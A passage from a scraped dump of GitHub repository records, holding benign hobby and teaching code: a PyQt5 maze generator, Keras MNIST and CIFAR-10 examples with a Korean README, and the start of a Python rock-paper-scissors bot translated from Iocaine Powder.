siz; j++)\n\t\t\t{\n\t\t\t\tmatrix[i][j] = min(matrix[i][j], matrix[i][k]+matrix[k][j]);\n\t\t\t}\n\t\t}\n\t}\n\n\t\n\t\n\t\n\tfor(i=0;i<siz;i++)\n\t{\n\t\tfor(j=0;j<siz;j++)\n\t\t{\n\t\t\tcout << matrix[i][j] << \"\\t\";\n\t\t}\n\t\tcout << \"\\n\";\n\t}\n}\n\nint main()\n{\n\tint matrix[siz][siz] = {\n\t\t\t\t\t\t\t{0, 3, max, 7},\n\t\t\t\t\t\t\t{8, 0, 2, max},\n\t\t\t\t\t\t\t{5, max, 0, 1},\n\t\t\t\t\t\t\t{2, max, max, 0}\n\t\t\t\t\t\t };\n\n\tfloydWarshall(matrix);\n}\n\n" } ]
84
yanchuga/first
https://github.com/yanchuga/first
dd4936a43783cc9f97c2b1ff9a8a0a745a35b1e6
30a745a4bb52d3d68dc532a015599fd1f4116c9e
0b99b7fe0be6b7d2661132c20212ce6cda7f27ba
refs/heads/master
2021-01-19T10:28:32.502233
2017-04-18T10:56:52
2017-04-18T10:56:52
87,869,580
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6364436745643616, "alphanum_fraction": 0.658450722694397, "avg_line_length": 31.457143783569336, "blob_id": "eb4b2defdbd19d7220134c60d35e08396b8f8c00", "content_id": "f7352eaf13edf981f6e383584f7b1d5b60b089ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1143, "license_type": "no_license", "max_line_length": 80, "num_lines": 35, "path": "/students/views.py", "repo_name": "yanchuga/first", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\n#view for Students\ndef students_list(request):\n students = (\n {'id':1,\n 'first_name': u'Виталий',\n 'last_name': u'Podoba',\n 'ticket': 235,\n 'image': 'img/podoba3.jpg'},\n {'id':2,\n 'first_name': u'Yan',\n 'last_name': u'Khadzhyisky',\n 'ticket': 2135,\n 'image': 'img/piv.png'},\n )\n return render(request, 'students/students_list.html', {'students':students})\ndef students_add(request):\n return HttpResponse('<h1>Students Add Form</h1>')\ndef students_edit(request, sid):\n return HttpResponse('<h1>Students Edit %s Form</h1>' % sid)\ndef students_delete(request, sid):\n return HttpResponse('<h1>Students Delete %s Form</h1>' % sid)\n\n#view for Groups\ndef groups_list(request):\n return HttpResponse('<h1>Groups List Form</h1>')\ndef groups_add(request):\n return HttpResponse('<h1>Groups Add Form</h1>')\ndef groups_edit(request, gid):\n return HttpResponse('<h1>Groups Edit %s Form</h1>' % gid)\ndef groups_delete(request, gid):\n return HttpResponse('<h1>Groups Delete %s Form</h1>' % gid)\n" } ]
1
darklatiz/writter-notebook
https://github.com/darklatiz/writter-notebook
35790ff2c8af36a141d4dc205024f96eb1146a83
0d57ca5134cac605911f9c911c1bbe72f749c519
a5e915a87f94cb3808c90ba5aef40d45912ee41f
refs/heads/master
2021-05-26T02:04:19.514977
2020-04-18T18:04:37
2020-04-18T18:04:37
254,010,806
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5341026782989502, "alphanum_fraction": 0.5409750938415527, "avg_line_length": 36.99014663696289, "blob_id": "a9997eb52bef83771c07e2c0b58cff03a2d155ba", "content_id": "e8cf440e5121f69a5f7c1025f016af7c8ef82f5b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7712, "license_type": "no_license", "max_line_length": 116, "num_lines": 203, "path": "/ui/maze.py", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "import PyQt5\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMenu, qApp, QAction, QMessageBox\nfrom PyQt5.QtGui import QPainter, QBrush, QPen, QIcon, QKeySequence\nfrom PyQt5.QtCore import Qt, QPoint\nimport math\nfrom things.Cell import Cell\nfrom collections import deque\nimport random\nimport time\nimport sys\n\n\nclass MazeGenerator(QMainWindow):\n '''\n Recursive BAckTacker\n '''\n\n def __init__(self, width=900, height=900, weight=3, top=150, left=150):\n QMainWindow.__init__(self)\n self.title = \"PyQt5 Drawing Rectangle\"\n self.top = top\n self.left = left\n self.width = width\n self.height = height\n self.grid = None\n self.w = weight\n self.init_window()\n self.rows = math.floor(self.width / self.w)\n self.columns = math.floor(self.width / self.w)\n self.back_tracker = deque()\n self.path = []\n self.current = None\n self.func = (None, None)\n self.grid_painted = False\n\n self.grid = self.__create_2d_array(self.rows, self.columns)\n\n for i in range(len(self.grid)):\n for j in range(len(self.grid[0])):\n self.grid[i][j] = Cell(i, j)\n self.back_tracker.append(self.grid[math.floor(self.rows / 2) + 1][math.floor(self.columns / 2)])\n\n self.func = (None, None)\n self.mModified = True\n\n # self.create_actions()\n # self.create_tool_bars()\n\n def init_window(self):\n self.setWindowIcon(QtGui.QIcon(\"icon.png\"))\n self.setWindowTitle(self.title)\n self.setGeometry(self.top, self.left, self.width, self.height)\n self.show()\n\n def create_actions(self):\n root = PyQt5.QtCore.QFileInfo(__file__).absolutePath()\n\n self.new_maze = QAction(QIcon(root + '/images/new.png'), \"&Create Maze\", self,\n shortcut=QKeySequence.New, statusTip=\"Start Maze Creation\",\n triggered=self.create_maze)\n\n self.save_as_action = QAction(QIcon(root + '/images/save.png'), \"Save &As...\", self,\n shortcut=QKeySequence.SaveAs,\n statusTip=\"Save the document under a new name\",\n triggered=self.save_as)\n\n self.exit_action = QAction(QIcon(root + '/images/exit.png'), \"&Exit\", self, shortcut=\"Ctrl+Q\",\n statusTip=\"Exit the application\", triggered=self.close)\n\n self.about_action = QAction(QIcon(root + '/images/about.png'), \"&About\", self,\n statusTip=\"Show the application's About box\",\n triggered=self.about)\n\n def create_tool_bars(self):\n self.create_bar = self.addToolBar(\"Create Maze\")\n self.create_bar.addAction(self.new_maze)\n self.create_bar.addAction(self.save_as_action)\n\n self.about_bar = self.addToolBar(\"About\")\n self.about_bar.addAction(self.exit_action)\n self.about_bar.addAction(self.about_action)\n\n def paintEvent(self, e):\n print(\"paint EVEnT >>>>>>>>>>>>\")\n if self.mModified:\n self.mModified = False\n\n painter = QPainter(self)\n painter.setPen(QPen(Qt.black, 1, Qt.SolidLine))\n\n if not self.grid_painted:\n for cell_list in self.grid:\n for cell in cell_list:\n cell.init_grid(painter, self.w)\n # self.grid_painted = True\n\n self.draw_path(painter)\n self.sent_painter(painter)\n painter.end()\n\n def sent_painter(self, 
qp):\n func, kwargs = self.func\n if func is not None:\n kwargs[\"painter\"] = qp\n func(**kwargs)\n\n def create_maze(self, painter):\n while len(self.back_tracker) > 0:\n # for i in range(1):\n if len(self.back_tracker) > 0:\n c_cell = self.back_tracker.pop()\n self.current = c_cell\n print(\"Current {0}\".format(c_cell))\n c_cell.visited = True\n self.path.append(c_cell)\n c_cell.draw_mark(painter, self.w)\n c_cell.check_neighbours(self.grid)\n not_visited_cells = [visited_cell for visited_cell in c_cell.neighbours if not visited_cell.visited]\n\n if len(not_visited_cells) > 0:\n # print(\"Pushing {0}\".format(self.current))\n self.back_tracker.append(self.current)\n # verify the neighbours that have not been visited\n len_n = len(not_visited_cells)\n if len_n > 1:\n random_index = random.randrange(0, len_n)\n else:\n random_index = 0\n\n n_cell = not_visited_cells[random_index]\n n_cell.visited = True\n # print(\"Pushing {0}\".format(n_cell))\n self.remove_walls(self.current, n_cell)\n self.back_tracker.append(n_cell)\n else:\n print(\"Finisehd.........\")\n for x in range(len(self.grid)):\n for y in range(len(self.grid[x])):\n c = self.grid[x][y]\n print('Cell ({0},{1}), visited= {2}'.format(c.row, c.col, c.visited))\n\n def draw_path(self, painter):\n for cell in self.path:\n painter.setPen(Qt.NoPen)\n # painter.setBrush(QBrush(Qt.darkGreen, Qt.SolidPattern))\n painter.setBrush(Qt.NoBrush)\n painter.drawRect(cell.col * self.w, cell.row * self.w, self.w, self.w)\n\n def remove_walls(self, current_cell, next_cell):\n pos_current = current_cell.col + self.columns * current_cell.row\n pos_next = next_cell.col + self.columns * next_cell.row\n\n # we are in the same row so subtracts cols\n if current_cell.row == next_cell.row:\n relative_col_pos = current_cell.col - next_cell.col\n if relative_col_pos == 1:\n current_cell.walls[\"left\"] = None\n next_cell.walls[\"right\"] = None\n elif relative_col_pos == -1:\n current_cell.walls[\"right\"] = None\n next_cell.walls[\"left\"] = None\n elif current_cell.col == next_cell.col:\n relative_row_pos = current_cell.row - next_cell.row\n if relative_row_pos == 1:\n current_cell.walls[\"top\"] = None\n next_cell.walls[\"bottom\"] = None\n elif relative_row_pos == -1:\n current_cell.walls[\"bottom\"] = None\n next_cell.walls[\"top\"] = None\n\n def save_as(self):\n print(\"to be implemented\")\n\n def about(self):\n QMessageBox.about(self, \"About Application\",\n \"The <b>Application</b> Maze Creation.\")\n\n def keyPressEvent(self, event):\n gey = event.key()\n self.func = (None, None)\n if gey == Qt.Key_M:\n print(\"Key 'm' pressed!\")\n elif gey == Qt.Key_Right:\n print(\"Right key pressed!, call drawFundBlock()\")\n self.func = (self.create_maze, {})\n self.mModified = True\n self.update()\n elif gey == Qt.Key_5:\n print(\"#5 pressed, call drawNumber()\")\n self.func = (self.drawNumber, {\"notePoint\": QPoint(100, 100)})\n self.mModified = True\n self.update()\n\n def __create_2d_array(self, rows, cols):\n return [[0] * cols for i in range(rows)]\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n maze_generator = MazeGenerator()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5124846696853638, "alphanum_fraction": 0.5407286286354065, "avg_line_length": 27.74117660522461, "blob_id": "83892b65c6f68626b227a0a96142ac24312cb390", "content_id": "429ed9ac7181324b433e8695091c4b266d55c966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2443, "license_type": 
"no_license", "max_line_length": 74, "num_lines": 85, "path": "/ui/example_repaint.py", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "import sys\n\nfrom PyQt5.QtCore import QRect, Qt, QPoint\nfrom PyQt5.QtGui import QPixmap, QPainter, QPen, QFont\nfrom PyQt5.QtWidgets import QWidget, QApplication\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.mModified = True\n self.initUI()\n self.currentRegion = QRect(50, 50, 50, 80)\n self.x0 = 5\n self.x1 = 25\n self.y0 = 5\n self.y1 = 25\n self.mPixmap = QPixmap()\n self.func = (None, None)\n\n def initUI(self):\n self.setGeometry(300, 300, 280, 270)\n self.setWindowTitle('Painter training')\n self.show()\n\n def paintEvent(self, event):\n if self.mModified:\n pixmap = QPixmap(self.size())\n pixmap.fill(Qt.white)\n painter = QPainter(pixmap)\n painter.drawPixmap(0, 0, self.mPixmap)\n self.drawBackground(painter)\n self.mPixmap = pixmap\n self.mModified = False\n\n qp = QPainter(self)\n qp.drawPixmap(0, 0, self.mPixmap)\n\n def drawBackground(self, qp):\n func, kwargs = self.func\n if func is not None:\n kwargs[\"qp\"] = qp\n func(**kwargs)\n\n def drawFundBlock(self, qp):\n pen = QPen(Qt.black, 2, Qt.SolidLine)\n pen.setStyle(Qt.DashLine)\n\n qp.setPen(pen)\n for i in range(1, 10):\n qp.drawLine(self.x0, i * self.y0, self.x1, self.y0 * i)\n\n def drawNumber(self, qp, notePoint):\n pen = QPen(Qt.black, 2, Qt.SolidLine)\n qp.setPen(pen)\n qp.setFont(QFont('Arial', 10))\n qp.drawText(notePoint, \"5\")\n\n def nextRegion(self):\n self.x0 += 30\n self.x1 += 30\n self.y0 += 30\n self.y1 += 30\n\n def keyPressEvent(self, event):\n gey = event.key()\n self.func = (None, None)\n if gey == Qt.Key_M:\n print(\"Key 'm' pressed!\")\n elif gey == Qt.Key_Right:\n print(\"Right key pressed!, call drawFundBlock()\")\n self.func = (self.drawFundBlock, {})\n self.mModified = True\n self.update()\n self.nextRegion()\n elif gey == Qt.Key_5:\n print(\"#5 pressed, call drawNumber()\")\n self.func = (self.drawNumber, {\"notePoint\": QPoint(100, 100)})\n self.mModified = True\n self.update()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5191534757614136, "alphanum_fraction": 0.5253147482872009, "avg_line_length": 32.035396575927734, "blob_id": "4fd775cadbd3abae18669fb3c6f6ebc877677425", "content_id": "d2bbf085bcfc117779e16e668617b51366b7d72a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3733, "license_type": "no_license", "max_line_length": 85, "num_lines": 113, "path": "/things/Cell.py", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "from builtins import IndexError\n\nfrom PyQt5.QtCore import Qt, QLine\nfrom PyQt5.QtGui import QBrush\nimport random\n\n\nclass Cell:\n\n def __init__(self, row, col):\n self.row = row\n self.col = col\n self.visited = False\n self.loaded_neighbours = False\n self.neighbours = []\n self.walls_created = False\n self.walls = {\n \"left\": None,\n \"right\": None,\n \"top\": None,\n \"bottom\": None\n }\n\n def init_grid(self, painter, w):\n x = self.col * w\n y = self.row * w\n\n # refactoring have a boolean variable once we have loaded all the walls\n # I am going to invert the axis\n if not self.walls_created:\n # top\n line_top = QLine(x, y, x + w, y)\n painter.drawLine(line_top)\n self.walls[\"top\"] = line_top\n\n # right\n line_right = QLine(x + w, y, x + w, y + w)\n painter.drawLine(line_right)\n 
self.walls[\"right\"] = line_right\n\n # bottom\n line_bottom = QLine(x + w, y + w, x, y + w)\n painter.drawLine(line_bottom)\n self.walls[\"bottom\"] = line_bottom\n\n # left\n line_left = QLine(x, y + w, x, y)\n painter.drawLine(line_left)\n self.walls[\"left\"] = line_left\n self.walls_created = True\n # print(\"{0} walls have been created\".format(self))\n else:\n # print(\"Walls repainted from data stored in array\")\n if self.walls[\"top\"] is not None:\n painter.drawLine(self.walls[\"top\"])\n\n if self.walls[\"right\"] is not None:\n painter.drawLine(self.walls[\"right\"])\n\n if self.walls[\"bottom\"] is not None:\n painter.drawLine(self.walls[\"bottom\"])\n\n if self.walls[\"left\"] is not None:\n painter.drawLine(self.walls[\"left\"])\n\n def draw_mark(self, painter, w):\n # print(\"Pintando MAgenta SQuare ({0},{1})\".format(self.row, self.col))\n if self.visited:\n painter.setPen(Qt.NoPen)\n # painter.setBrush(QBrush(Qt.darkMagenta, Qt.SolidPattern))\n painter.setBrush(QBrush(Qt.darkMagenta, Qt.SolidPattern))\n painter.setBrush(Qt.NoBrush)\n painter.drawRect(self.col * w, self.row * w, w, w)\n\n def check_neighbours(self, the_grid):\n if not self.loaded_neighbours:\n self.get_neighbours_from_grid(the_grid)\n\n def get_neighbours_from_grid(self, the_grid):\n try:\n # top\n c = the_grid[self.row][self.col - 1]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row, self.col - 1))\n\n try:\n # right\n c = the_grid[self.row + 1][self.col]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row + 1, self.col))\n\n try:\n # bottom\n c = the_grid[self.row][self.col + 1]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row, self.col + 1))\n\n try:\n # left\n c = the_grid[self.row - 1][self.col]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row - 1, self.col))\n\n def __str__(self):\n return \"Cell({0},{1})\".format(self.row, self.col)\n" }, { "alpha_fraction": 0.7254902124404907, "alphanum_fraction": 0.7450980544090271, "avg_line_length": 11.75, "blob_id": "a288ff7219014b71aa268588a4354e375c10306f", "content_id": "de98ac65a7017b51f9defe3328bc6cffc3911a08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/README.md", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "# GUI Python\n\n## Installing PyQT\npip install PyQt5\n" } ]
4
snu-stat/dnn-cs-posco
https://github.com/snu-stat/dnn-cs-posco
a9a85e4a350455fa82fa28cbdb8f51f01b1482df
b759bcc88c3705a0935261afb932fee672e42243
9aefe6b50f71139496c4453bd16a8bb7b7bb39c4
refs/heads/master
2021-01-15T11:25:21.267059
2016-10-03T10:39:54
2016-10-03T10:39:54
48,526,342
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6534653306007385, "alphanum_fraction": 0.6806930899620056, "avg_line_length": 27.785715103149414, "blob_id": "8f6e20f37f1e66f312cee56ebf41af774af39256", "content_id": "31ad1837d83633937efaba4fe7008148ab699564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 68, "num_lines": 14, "path": "/data_png2.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\nimg = mpimg.imread('lena_color.png')\nprint('img shape', img.shape)\nplt.imshow(img)\nplt.show()\n\nimg = img.transpose(2, 0, 1)\nimg = img.reshape(1, 3, 512, 512)\nprint('type=',type(img), ', shape=', img.shape, ', ndim=', img.ndim)\nprint('data type=', img.dtype.name)\nprint('item size=', img.itemsize, ', size=', img.size)\n\n" }, { "alpha_fraction": 0.7015674114227295, "alphanum_fraction": 0.7115987539291382, "avg_line_length": 57.925926208496094, "blob_id": "839571cdd851a83b30e52566b09a5e27f7f81070", "content_id": "0535c350445cd41c25acf612a11bca7dfcb71aea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2339, "license_type": "no_license", "max_line_length": 159, "num_lines": 27, "path": "/README.md", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "# 인공 신경망과 딥 러닝 강의 실습 코드\n* [Keras library](http://keras.io)를 이용한 딥 뉴럴 네트워크 실습 코드입니다.\n* 해당 코드를 이용해 실습을 진행하기 위해서는 [Python 2.7](https://www.python.org/), [Theano](http://deeplearning.net/software/theano/#), [Keras library](http://keras.io)가 필요합니다.\n\n## 코드 구성\n* [mnist_shallow.py](https://github.com/snu-stat/dnn-cs/blob/master/mnist_shallow.py)\n + MNIST 데이터의 구분을 위한 얕은 네트워크(shallow network)를 구성해 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드\n* [mnist_deep.py](https://github.com/snu-stat/dnn-cs/blob/master/mnist_deep.py)\n + MNIST 데이터의 구분을 위한 깊은 네트워크(deep network)를 구성해 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드\n* [mnist_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/mnist_cnn.py)\n + CNN(Convolutional Neural Network) 네트워크 구조를 더 쌓아 구성한 deep Convolutional Network를 이용해 MNIST 데이터를 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드 \n* [cifar10_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/cifar10_cnn.py)\n + CNN 네트워크 구조를 이용해 CIFAR-10 데이터를 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드\n + Model, weight, history를 저장\n* [test_mnist_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/test_mnist_cnn.py)\n + MNIST 데이터를 이용해 훈련된 네트워크를 불러와, model, history, 각 층의 결과를 확인하는 코드\n* [test_cifar10_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/test_cifar10_cnn.py)\n + CIFAR-10 데이터를 이용해 훈련된 네트워크를 불러와, model, history, 각 층의 결과를 확인하는 코드\n\n## GPU 사용\n* GPU 사용이 가능한 컴퓨터의 경우, Theano에서 제공하는 GPU 병렬화 기능을 사용하기 위해서는 Theano flag를 GPU 계산을 위해 셋팅해야 함.\n + 예를 들어 mnist_shallow.py 프로그램을 GPU에서 실행시키려 할 경우, Command-line Prompt에 다음과 같이 입력해 코드를 실행 \n\n```\n> THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32\n> python mnist_shallow.py\n``` \n" }, { "alpha_fraction": 0.6362888216972351, "alphanum_fraction": 0.6745525598526001, "avg_line_length": 38.19355010986328, "blob_id": "8c11211aa22e9817053806c99cf9f041eb466d64", "content_id": "784dbef90a7cf25a1669b945982528c009fb51fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4861, "license_type": "no_license", "max_line_length": 120, "num_lines": 124, "path": "/test_cifar10_cnn.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": 
"UTF-8", "text": "from __future__ import print_function\n\nfrom keras.datasets import cifar10 \nfrom keras.models import Sequential\n\nfrom keras.models import model_from_json\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport theano\nimport json\n\nbatch_size = 128\nnb_classes = 10\nnb_epoch = 20\n# input image dimensions\nimg_rows, img_cols = 32, 32\n# the CIFAR10 images are RGB\nimg_channels = 3\n\n# the data, shuffled and split between tran and test sets\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nif K.image_dim_ordering() == 'th':\n X_test = X_test.reshape(X_test.shape[0], img_channels, img_rows, img_cols)\n input_shape = (img_channels, img_rows, img_cols)\nelse:\n X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, img_channels)\n input_shape = (img_rows, img_cols, img_channels)\nX_test = X_test.astype('float32')\nX_test /= 255\nprint(X_test.shape[0], 'test samples')\n\n# Reconstruct model\nmodel = model_from_json(open('cifar10_model_architecture.json').read())\nmodel.load_weights('cifar10_model_weights.h5')\n\n# Plot history \nhist = json.loads(open('cifar10_model_history.json').read())\n\nplt.figure('history')\nplt.subplot(211)\nplt.title('Loss over epochs')\nplt.plot(hist['loss'],'r',label='loss')\nplt.plot(hist['val_loss'], 'b',label='val_loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\n\nplt.subplot(212)\nplt.title('Accuracy over epochs')\nplt.plot(hist['acc'],'r',label='acc')\nplt.plot(hist['val_acc'], 'b',label='val_acc')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\n\nplt.tight_layout()\nplt.show()\n\n# Get output of each layer\nget_1st_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[0].output])\nget_2nd_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[2].output])\nget_3rd_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[7].output])\nget_last_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[10].output])\nprint('X_test image shape:', X_test.shape)\nlayer_1_output = get_1st_layer_output([X_test,0])[0]\nprint('Print 1st layer output', layer_1_output.shape)\nlayer_2_output = get_2nd_layer_output([X_test,0])[0]\nprint('Print 2nd layer output', layer_2_output.shape)\nlayer_3_output = get_3rd_layer_output([X_test,0])[0]\nprint('Print 3rd layer output', layer_3_output.shape)\nlayer_last_output = get_last_layer_output([X_test,0])[0]\nprint('Print last layer output', layer_last_output.shape)\n\n# Predict classes and probability\nprint('Predict classes')\nclasses = model.predict_classes(X_test, batch_size)\nprint('Predict probability')\nproba = model.predict_proba(X_test, batch_size)\n\n# Plot output of each layer\ndef plotvalue(index):\n plt.figure('Input data and 1~4 layer output value of X_test[{idx}]'.format(idx=index), figsize=(12,9), dpi=100)\n plt.subplot2grid((5,8),(0,0),rowspan=2,colspan=2)\n plt.title('Input data')\n plt.imshow(X_test[index].transpose(1,2,0))\n\n plt.subplot2grid((5,8),(0,2))\n plt.imshow(layer_1_output[index][0], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,3))\n plt.imshow(layer_1_output[index][1], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,4))\n plt.imshow(layer_1_output[index][2], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,2))\n plt.imshow(layer_1_output[index][3], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,3))\n plt.imshow(layer_1_output[index][4], cmap='bone', 
interpolation='nearest')\n\n plt.subplot2grid((5,8),(0,5))\n plt.imshow(layer_2_output[index][0], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,6))\n plt.imshow(layer_2_output[index][1], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,7))\n plt.imshow(layer_2_output[index][2], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,5))\n plt.imshow(layer_2_output[index][3], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,6))\n plt.imshow(layer_2_output[index][4], cmap='bone', interpolation='nearest')\n\n plt.subplot2grid((5,8),(2,0),colspan=8)\n plt.imshow(layer_3_output[index].reshape(1,layer_3_output.shape[1]), cmap='bone', interpolation='nearest')\n\n plt.subplot2grid((5,8),(3,0),colspan=8)\n plt.title('probability prediction')\n plt.plot(proba[index],'r',label='probability')\n\n plt.subplot2grid((5,8),(4,0),colspan=8)\n plt.title('Last layer output={ans}, y_test={sol}'.format(ans=classes[index],sol=y_test[index]))\n plt.imshow(layer_last_output[index].reshape(1,layer_last_output.shape[1]), cmap='bone', interpolation='nearest')\n\n plt.tight_layout()\n plt.show()\n\n# Plot test data\nplotvalue(0)\nplotvalue(1)\nplotvalue(2)\n\n" }, { "alpha_fraction": 0.6112040281295776, "alphanum_fraction": 0.6354514956474304, "avg_line_length": 28.170732498168945, "blob_id": "b0e9fd7c08a828f2f3522b5a0836a2fe6ff94b72", "content_id": "a160c9724390b1d31d262170a906605d3796520e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 75, "num_lines": 41, "path": "/data_numpy.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "from keras.utils import np_utils\nimport numpy as np\n\na = np.array([0,0,1,1,2,2,1,1,3,3,0,0])\nb = np.array([(0,1,2),(1,3,0)])\n\nprint('a')\nprint('type=',type(a), ', shape=', a.shape, ', ndim=', a.ndim)\nprint('data type=', a.dtype.name)\nprint('item size=', a.itemsize, ', size=', a.size)\n\nprint('b')\nprint('type=',type(b), ', shape=', b.shape, ', ndim=', b.ndim)\nprint('data type=', b.dtype.name)\nprint('item size=', b.itemsize, ', size=', b.size)\n\na = a.reshape(6,2)\nb = b.reshape(6)\n\na = a.astype('float32')\nc = np_utils.to_categorical(b, 4)\n\nprint('a')\nprint('type=',type(a), ', shape=', a.shape, ', ndim=', a.ndim)\nprint('data type=', a.dtype.name)\nprint('item size=', a.itemsize, ', size=', a.size)\n\nprint('c')\nprint('type=',type(c), ', shape=', c.shape, ', ndim=', c.ndim)\nprint('data type=', c.dtype.name)\nprint('item size=', c.itemsize, ', size=', c.size)\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation\nfrom keras.optimizers import SGD\n\nmodel = Sequential()\nmodel.add(Dense(4, init='uniform', input_shape=(2,), activation='softmax'))\nmodel.compile(loss='mse', optimizer='sgd', metrics=['accuracy'])\n\nmodel.fit(a, c, batch_size=1, nb_epoch=3, verbose=1)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6878306865692139, "avg_line_length": 28.076923370361328, "blob_id": "c0b1fa16dd6f0c7fd88c984a4bc0bee006adf8ed", "content_id": "ffaa7586b66e844c5030af1e0d29f746ee7babbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/data_png.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport matplotlib.image as 
mpimg\nimport numpy as np\n\nimg = mpimg.imread('lena.png')\nprint('img shape', img.shape)\nplt.imshow(img, cmap='bone')\nplt.show()\n\nimg = img.reshape(1,1,512,512)\nprint('type=',type(img), ', shape=', img.shape, ', ndim=', img.ndim)\nprint('data type=', img.dtype.name)\nprint('item size=', img.itemsize, ', size=', img.size)\n" } ]
5
erdman/roshambo
https://github.com/erdman/roshambo
edff799085b93a5c476142f4cc57ed73e0ac478d
c8f174151634544e5aa18698f8b9b6306d1b424f
55cc3551b486836b1565ba80101a09af092320b6
refs/heads/master
2021-01-22T04:40:26.072847
2012-07-28T23:10:21
2012-07-28T23:10:21
5,187,176
9
0
null
null
null
null
null
[ { "alpha_fraction": 0.520636260509491, "alphanum_fraction": 0.5361135005950928, "avg_line_length": 37.75, "blob_id": "fefab95c9a556662001cf8578495f35a053be59f", "content_id": "374e2f12ace769fde14f2903c4113e60ab3ccb2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4652, "license_type": "no_license", "max_line_length": 139, "num_lines": 120, "path": "/iocaine.py", "repo_name": "erdman/roshambo", "src_encoding": "UTF-8", "text": "# python translation of Dan Egnor's Iocaine Powder\n# http://ofb.net/~egnor/iocaine.html\n\ndef player(my_moves, opp_moves):\n import random\n from itertools import izip\n rps_to_text = ('rock','paper','scissors')\n rps_to_num = {'rock':0, 'paper':1, 'scissors':2}\n superior = (1,2,0)\n inferior = (2,0,1)\n\n ages = (1000,100,10,5,2,1)\n guess = random.choice([0,1,2])\n\n TRIALS = 1000\n\n def match_single(i,moves):\n j = 0\n for high,low in izip(reversed(moves),reversed(moves[:i])):\n if high == low and j < i:\n j += 1\n else:\n return j\n\n def match_both(i):\n j = 0\n for my_high,my_low,opp_high,opp_low in izip(reversed(my_moves),reversed(my_moves[:i]),reversed(opp_moves),reversed(opp_moves[:i])):\n if my_high == my_low and opp_high == opp_low and j < i:\n j+= 1\n else:\n return j\n\n def match_history(age,moves=None):\n best = 0\n best_length = 0 # was None, but logic breaks bc 0 > None in j > best_length test below\n num = 